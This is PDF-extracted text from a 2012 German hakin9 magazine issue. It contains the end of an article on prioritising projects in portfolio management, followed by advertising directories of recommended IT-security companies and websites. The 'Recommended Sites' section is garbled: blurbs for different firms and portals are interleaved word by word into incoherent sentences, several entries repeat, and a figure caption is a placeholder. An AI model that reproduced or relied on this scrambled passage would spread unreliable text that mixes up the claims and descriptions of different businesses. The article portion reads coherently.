• Reduktion von Fehlinvestitionen durch das frühzeitige Erkennen von Maßnahmen und Projekten mit
hohem Nutzen
• Vergleichbarkeit von Maßnahmen und Projekten
aus unterschiedlichen Bereichen und auch stark
unterschiedlicher Vorhaben
• Leichtere Integration von Projekten ins laufende
Projektportfolio mit der Möglichkeit zur Simulation
von Kosten- und Nutzenkonsequenzen „in Echtzeit“
• Möglichkeit zum monatlichen oder quartalsweise
Update / Review zu allen Projekten bei minimalem
Aufwand,
• Zeit- und Kostenreduzierung im Management des
Projektportfolios über den gesamten Prozess hinweg
• Reduktion von Projektanfragen und Maßnahmen
ohne oder mit zu geringem Nutzen
• Für alle Beteiligte transparente und nachvollziehbare Entscheidungen bei der Projektpriorisierung
Mut zur Lücke
Ein gesundes Bauchgefühl ist immer wichtiger, das zeigen uns die vielen inhabergeführten Unternehmen.
Um dem Bauchgefühl aber den systematischen Hintergrund zu geben ist ein gewisser Mut zur Lücke notwendig! D.h. es ist notwendig die Bewertungsmethode
durch die Konzentration auf wenige, strategisch bedeutsame Kriterien einfach zu halten. Die Systematik
der Nutzenermittlung und ein einheitliches Bewertungssystem stellen dabei die Basis für eine erfolgreiche Priorisierung dar. Eine gemeinsame Betrachtung qualitativer und monetärer Größen, ohne sie zu einer einzigen
Kennzahl zu vermischen und einen „Entscheidungsautomatismus“ anzustreben, ist erfolgsentscheidend.
Abbildung 1. xxxxxxxx
hakin9.org/de
39
UNTERNEHMENSSICHERHEIT
Es gilt bei der Implementierung der Methodik auch eine gemeinsame Kommunikationsplattform unterschiedlicher Interessenslagen und Perspektiven zu schaffen.
Dabei entscheiden Grafiken und deren Interpretation
als Gesprächsgrundlage für Techniker, Kaufleute und
andere Beteiligte in einem Tool ob die Methode „gelebt“
wird – oder wie so vieles verstaubt.
Kritische Erfolgsfaktoren
Beim Portfoliomanagement hat sich eine unternehmensspezifische Methode, die partizipativ erarbeitet
und verabschiedet wurde, durchgesetzt. Die Bewertung
darf aber nicht nur anhand von Kostenaspekten im Sinne einer ROI-Betrachtung erfolgen, sondern muss strategische Aspekte der Priorisierung wie Zielkonformität
mit den Unternehmenszielen, wie auch Qualitäts-, Zeit-,
Flexibilität, Kunden-, Mitarbeiteraspekte oder Implementierungseignung berücksichtigen.
Transparenz hinsichtlich wesentlicher entscheidungsrelevanter strategischer Dimensionen einer Maßnahme
und eine übersichtliche Visualisierung in einem Monitor sind von wesentlicher Bedeutung. Neben einiger
notwendigen Basisdaten wird der „Kostennutzen“ (z.B.
Potenzial zur Reduktion von Betriebskosten und zur Erzeugung von „Mehrwerten“ in den Geschäftsprozessen)
ermittelt und erfasst. Zusammen mit den weichen, qualitativen Nutzenwirkungen für das eigene Unternehmen
und bei Kunden werden die Projekte bewertet. Wichtig
dabei ist es, die Integrationsfähigkeit in bestehende
Systematiken und vor allem die Unterstützung der Strategie zu berücksichtigen um echtes Business-Alignment herzustellen. Eine zusammenfassende Chancen-/
Risiko-Betrachtung z.B. in der technischen, zeitlichen
und Kostendimension sollte zum Abschluss erfolgen.
Typische Fragen der Priorisierung
Geklärt werden müssen u.a. folgende Punkte:
• Welches Vorhaben unterstützt insgesamt die Geschäftsstrategie maßgeblich?
• Welche Maßnahmen haben die größten Erfolgsaussichten?
• Welche Maßnahmen haben neben den messbaren
Nutzenkriterien das größte Potential bei schlecht
messbaren Nutzenargumenten?
• Welches sind die kritischen Erfolgsfaktoren der
Projekt- oder Maßnahmebewertung?
• Wie kommt man zu einer neutralen, nutzenorientierten Priorisierung?
• Wie kann man ganz unterschiedliche Ideen nach
einem einheitlichen Muster vergleichen?
• Wie lassen sich die Positionen PRO und CONTRA
von Maßnahmen übersichtlich darstellen?
• Wie lauten die relevanten Fragen für die Auswahl
von Maßnahmen?
40
Fazit: Die richtige Priorisierung schafft
Wettbewerbsvorteile und erleichtert das
Tagesgeschäft
Um eine Ausrichtung der Maßnahmen auf die Strategie
und eine Vergleichbarkeit zu erreichen, ist eine standardisierte Methode sowie eine eindeutige Bewertungsgrundlage Voraussetzung. Dabei ist es wichtig,
typische Fehler zu vermeiden: Eine reine Kostenbetrachtung (ROI), bei der andere unternehmenskritische Aspekte (Passung zur Strategie, Zeit, Qualität,
Kundennutzen, Wettbewerb…) außen vor bleiben. Eine
Verdichtung auf eine Kennzahl eliminiert das unternehmerisches „Gefühl“, Erfahrungen fließen nicht mit ein.
Eine zu komplexe Methode / Tool führt zu einem zu hohen Bewertungsaufwand. Durch eine „Echtzeit-Erstellung“ von Entscheidungsgrundlagen spart man viel Zeit
und sonst so hohen Bearbeitungsaufwand. Ein partizipativer Ansatz führt dabei zu einer durchgängigen Akzeptanz der Methode.
Um Hintergründe, Aufbau und Ablauf der Methodik
transparent zu machen, müssen zu Beginn eins Projektes die Interviewpartner in einem Workshop zusammengeführt werden. In persönlichen Interviews zu den
Maßnahmen (mit dem Ziel, dass weitere Maßnahmen
auf Grund der Einheitlichkeit des Ansatzes und der
Usability des Fragenkatalogs zukünftig ohne persönliche Interviews bewertet werden können) erfolgt die
Diskussion der Ergebnisse und Priorisierung der untersuchten Maßnahmen, inkl. Kurzbegründung für die Zuordnung zu einer Kategorien- und Wertigkeitsklasse. Im
Anschluss erfolgt ggf. eine Präsentation der Ergebnisse
der Pilotphase im größeren Kreis, gleichzeitig als Feedback für alle Beteiligten.
Eine systematische Ausrichtung von Maßnahmen
auf die Unternehmensstrategie erhöht den operativen
Gewinn nachhaltig. Eine Toolunterstützung steigert die
Transparenz und Effizienz des gesamten Priorisierungsprozesses.
Prof. Dr. Rudolf Dögl, Michael Jost
Prof. Dr. Rudolf Dögl
Professor an der FH Würzburg-Schweinfurt für
die Lehrgebiete Innovationsmanagement, Businessplanung, Wissensmanagement und Marketing Mitglied des wissenschaftlichen SCOPAR-Beratergremiums
Michael Jost
IT-Executive, Head of IT-Consulting Mitglied
des SCOPAR-Beratergremiums
3/2012
Recommended Companies
Mabunta
Die mabunta GmbH agiert als hochspezialisierter und kompetenter Partner
rund um IT-Security- und Netzwerk-Lösungen. Wir unterstützen bei IT-Sicherheitsfragen in allen Unternehmensbereichen, verbinden Wachstum mit
sicherer Kommunikation.
Alles in allem- mabunta „one-face-tothe-customer“, Ihr Spezialist in Fragen
der IT-Sicherheit.
www.mabunta.de
SEC Consult
SEC Consult
SEC Consult ist der führende Berater
für Information Security Consulting in
Zentraleuropa. Die vollständige Unabhängigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden. Unsere Dienstleistungen umfassen externe/interne Sicherheitsaudits,
(Web-) Applikationssicherheit (ONR 17700), Sicherheitsmanagement-Prozesse
(ISO 27001) etc.
www.sec-consult.com
Tele-Consulting GmbH
Vom BSI akkreditiertes Prüflabor für ITSicherheit, hakin9 und c’t Autoren, jahrelange Erfahrung bei der Durchführung
von Penetrationstests und Security-Audits, eigener Security Scanner „tajanas”,
Sicherheitskonzepte, Risikoanalysen,
IT-Grundschutz-Beratung, 3 lizenzierte
ISO 27001-Auditoren, VoIP-Planung
und -Security
secXtreme GmbH
schützt Ihre Web-Anwendungen bis
auf Applikationsebene. Dazu gehört
sowohl die Prüfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen für Sicherheit im
Entwicklungsprozess und Schutzlösungen (Web Application Firewalls) bei
Großunternehmen und dem gehobenen
Mittelstand.
www.sec-Xtreme.com
B1 Systems
Die B1 Systems ist international tätig
in den Bereichen Linux/Open Source
Consulting, Training und Support. B1
Systems spezialisiert sich in den Bereichen Virtualisierung und Cluster.
info@b1-systems.de
www.b1-systems.de
Blossey & Partner
Consulting Datenschutzbüro
Datenschutz ist EU-weit gesetzliche Anforderung. Wir sorgen für die Erfüllung
rechtlicher Vorschriften und kümmern
uns um ein angemessenes Datenschutzniveau in Ihrem Unternehmen,
auch international. Wir erledigen alle erforderlichen Aufgaben, die Fäden behalten Sie in der Hand. Nutzen Sie unser
Erstberatungsgespräch.
www.tele-consulting.com
www.blossey-partner.de
Recommended Companies
m-privacy GmbH
NESEC
NESEC ist Ihr Spezialist für Penetrationstests, Sicherheitsanalysen und
IT-Security Counsulting. Das NESEC
Pentest-Team unterstützt Sie bei Sicherheitsprüfungen Ihrer Netzwerke
und Webapplikationen sowie bei Source Code Audits. Bei Bedarf optimieren
wir Ihre Policy, sensibilisieren Ihre
Mitarbeiter und zertifizieren Ihr Unternehmen nach ISO 27001.
IT-Sicherheitslösungen – funktional und
einfach zu bedienen!
So präsentieren sich die von m-privacy
entwickelten TightGate™-Server, z.B.
TightGate™-Pro mit Datenschutz-Gütesiegel. Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage, Online-Razzien und
gezielten Angriffen!
www.m-privacy.de
www.nesec.de
Seed Forensics GmbH
Die Seed Forensics GmbH bietet
für Strafverfolgungsbehörden professionelle
Unterstützung
in
den
Bereichen der Datensicherstellung
und Datenträgerauswertung. Selbstverständlich
entsprechen
unsere
Mitarbeiter, unser technisches Equip0ment und auch unsere Räumlichkeiten
den notwendigen Anforderungen.
OPTIMAbit GmbH
Wir sind Spezialisten für Entwicklung
und Security. Wir sichern Java, .NET
und Mobile Applikationen gegen Angriffe
externer und interner Art. Unsere Dienste umfassen Audits, Code Reviews,
Penetrationstest, sowie die Erstellung
von Policies. Zusätzlich bieten wir Seminare zu sicherheitsrelevanten Themen.
www.optimabit.com
www.seed-forensics.de
Protea Networks
Protea ist spezialisiert auf IT-SecurityLösungen: Verschlüsselung, Firewall/
VPN, Authentifizierung, Content-Filtering, etc. Wir bieten umfassende Beratung, Vertrieb von Security-Hard- und
Software, Installation und umfangreiche
Dienstleistungen (z. B. Konzeption, Trainings). Protea setzt auf Lösungen der
Markt- und Technologieführer und hält
dafür direkten inhouse-Support bereit.
www.proteanetworks.de
SecureNet GmbH, München
Als Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwendungen: Anwendungs-Pentests, Sourcecodeanalysen, Secure Coding Guidelines, Beratung rund um den Software
Develoment Lifecycle. Tools: Application
Firewalls, Application Scanner, Fortify
SCA/Defender/Tracer.
www.securenet.de
secadm
secadm ist durchtrainierter Spezialist für
Airbags, ABS und Sicherheitsgurte in der
IT. Zehn IT-Sicherheitsexperten mit 70
Mannjahren Erfahrung beraten, entwickeln und implementieren IT-Lösungen
für Kunden weltweit. Der Fokus liegt dabei auf Themen wie Prozess-Optimierung
und Security-Management. Risiko-Analyse, die Sicherheitsberatung, Auditing, Security-Leitfäden, Software-Entwicklung,
Reporting bis zum Training.
www.secadm.de
underground_8
secure computing gmbh
Wir entwickeln und vertreiben security appliances für die Bereiche Unified
Threat Management, Traffic Shaping
und Antispam. Unsere Lösungen sind
hardwarebasiert und werden über Distributoren, Reseller und Systemintegratoren implementiert und vertrieben.
www.underground8.com
Die Seed Forensics GmbH bietet für Strafverfolgungsbehörden professionelle Unterstützung
in den Bereichen der Datensicherstellung und
Datenträgerauswertung.
Selbstverständlich
entsprechen unsere Mitarbeiter, unser technisches Equipment und auch unsere Räumlichkeiten den notwendigen Anforderungen.
www.seed-forensics.de
Datenschutz ist EU-weit gesetzliche Anforderung. Wir sorgen für die Erfüllung rechtlicher
Vorschriften und kümmern uns um ein angemessenes Datenschutzniveau in Ihrem Unternehmen, auch international.
www.blossey-partner.de
Die Netzwerktechnik steht auf www.easy-network.de im Mittelpunkt. Artikel, Tutorials und
ein Forum bieten genügen Stoff für kommende
Administratoren und Netzwerkprofis.
Datenschutz ist EU-weit gesetzliche Anforderung. Wir sorgen für ist
die eine
Erfüllung
rechtlicher
Securitymanager.de
Produktion
des
Vorschriften und
kümmern
uns um ein
Online-Verlag
FEiG
& PARTNER.
Seitangedem
messenes
Datenschutzniveau
in Ihrem
Start hat sich
Securitymanager.de
zu Untereinem
nehmen, auchOnline-Informationsportal
international.
führenden
in
www.blossey-partner.de
Deutschland entwickelt
und versteht sich als
unabhängiger Informationsdienstleister der
IT- und Information-Security-Branche.
www.securitymanager.de
Die Netzwerktechnik steht auf www.easy-network.de im Mittelpunkt.
Artikel,
Tutorials
und
Happy-Security
ist ein neues
Portal
mit Secuein Forum bietenIT-Quiz,
genügen
Stoff für kommende
rity-Challanges,
Web-Bibliothek,
MultiAdministratoren
und Netzwerkprofis.
media-Center
& vielen
weiteren Features.
www.happy-security.de
www.easy-network.de
Die Seed Forensics GmbH bietet für Strafverfolgungsbehörden
professionelle
Hier
findest Du alles,
was dasUnterstützung
Herz eines
in den Bereichenhöher
der Datensicherstellung
und
Computerfreaks
schlagen lässt: Geek
Datenträgerauswertung.
Selbstverständlich
Wear
mit intelligenten Sprüchen,
eine riesige
entsprechen
unsereund
Mitarbeiter,
Auswahl
Gadgets
natürlich unser
auch techviele
nischesTools.
Equipment und auch unsere RäumliHacker
chkeiten den notwendigen
Anforderungen.
www.getDigital.de
www.seed-forensics.de
Securitymanager.de ist eine Produktion des
Online-Verlag
FEiG IT-Security:
& PARTNER.
SeitZiel
dem
Pericom base camp
Unser
ist
Start
hat sich
Securitymanager.de
einem
es, unsere
Kunden
vor möglichen zu
Gefahren
führenden
Online-Informationsportal
in
für Ihre IT-Infrastruktur
bestmöglich zu schütDeutschland
entwickelt
sich als
zen. Neben der
Analyseund
vonversteht
Risikopotentiaunabhängiger
Informationsdienstleister
der
len durch Security
Audits bieten wir, durch
ITund
Information-Security-Branche.
die Implementierung von Security-Lösungen,
www.securitymanager.de
Schutz vor konkreten
Gefahren.
Happy-Security
ein neues
Portal
SecuCloudSafe
stellt ist
seinen
Nutzern
einemit
Plattform
rity-Challanges,
IT-Quiz,
Web-Bibliothek,
Multizur
kryptographisch
sicheren
Ablage und Verwalmedia-Center
& vielen
weiteren
Features.
tung
von sensiblen
Daten
zur Verfügung:
Nutzer
www.happy-security.de
können auf CloudSafe
beliebig viele Dokumente
in virtuellen Safes ablegen. Es können weiteren Personen individuelle Zugriffsrechte auf die
Safes eingeräumt und somit ein sicherer Datenaustausch ermöglicht werden.
www.cloudsafe.com
Hier findest Du alles,
was das
AV-Comparatives
geht hervor
ausHerz
dem eines
InnsComputerfreaks
höher schlagen
lässt:
brucker
Kompetenzzentrum
und gilt
als Geek
eines
Wearbekanntesten
mit intelligenten
Sprüchen, eine
riesige
der
unabhängigen
Testhäuser
Auswahl
Gadgets und natürlich auch viele
für
Antiviren-Software.
Hacker Tools.
www.av-comparatives.org
www.getDigital.de
www.pericom.at
Recommended Sites
www.easy-network.de
Wollen Sie Ihre Seite empfehlen, kontaktieren Sie bitte: de@hakin9.org
Pericom base camp IT-Security: Unser Ziel ist
es, unsere Kunden vor möglichen Gefahren
für Ihre IT-Infrastruktur bestmöglich zu schützen. Neben der Analyse von Risikopotentialen durch Security Audits bieten wir, durch
die Implementierung von Security-Lösungen,
Schutz vor konkreten Gefahren.
www.pericom.at
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwaltung von sensiblen Daten zur Verfügung: Nutzer
können auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen. Es können weiteren Personen individuelle Zugriffsrechte auf die
Safes eingeräumt und somit ein sicherer Datenaustausch ermöglicht werden.
www.cloudsafe.com
base-camp
IT-Security
Solutions:
Unser
AV-Comparatives
geht &
hervor
aus dem
InnsZiel
ist es,
unsere Kunden vor
möglichen
brucker
Kompetenzzentrum
und
gilt als eines
Gefahren
für Ihre IT-Infrastruktur
der bekanntesten
unabhängigenbestmöglich
Testhäuser
zu
Neben der Analyse von Risikofür schützen.
Antiviren-Software.
potentialen durch
Security Audits bieten wir,
www.av-comparatives.org
durch die Implementierung von SecurityLösungen, Schutz vor konkreten Gefahren.
www.base-camp.cc
Wollen Sie Ihre Seite empfehlen, kontaktieren Sie bitte: de@hakin9.org
Document
Kategorie
Internet
Seitenansichten
26
Dateigröße
7 672 KB
Tags
1/--Seiten
melden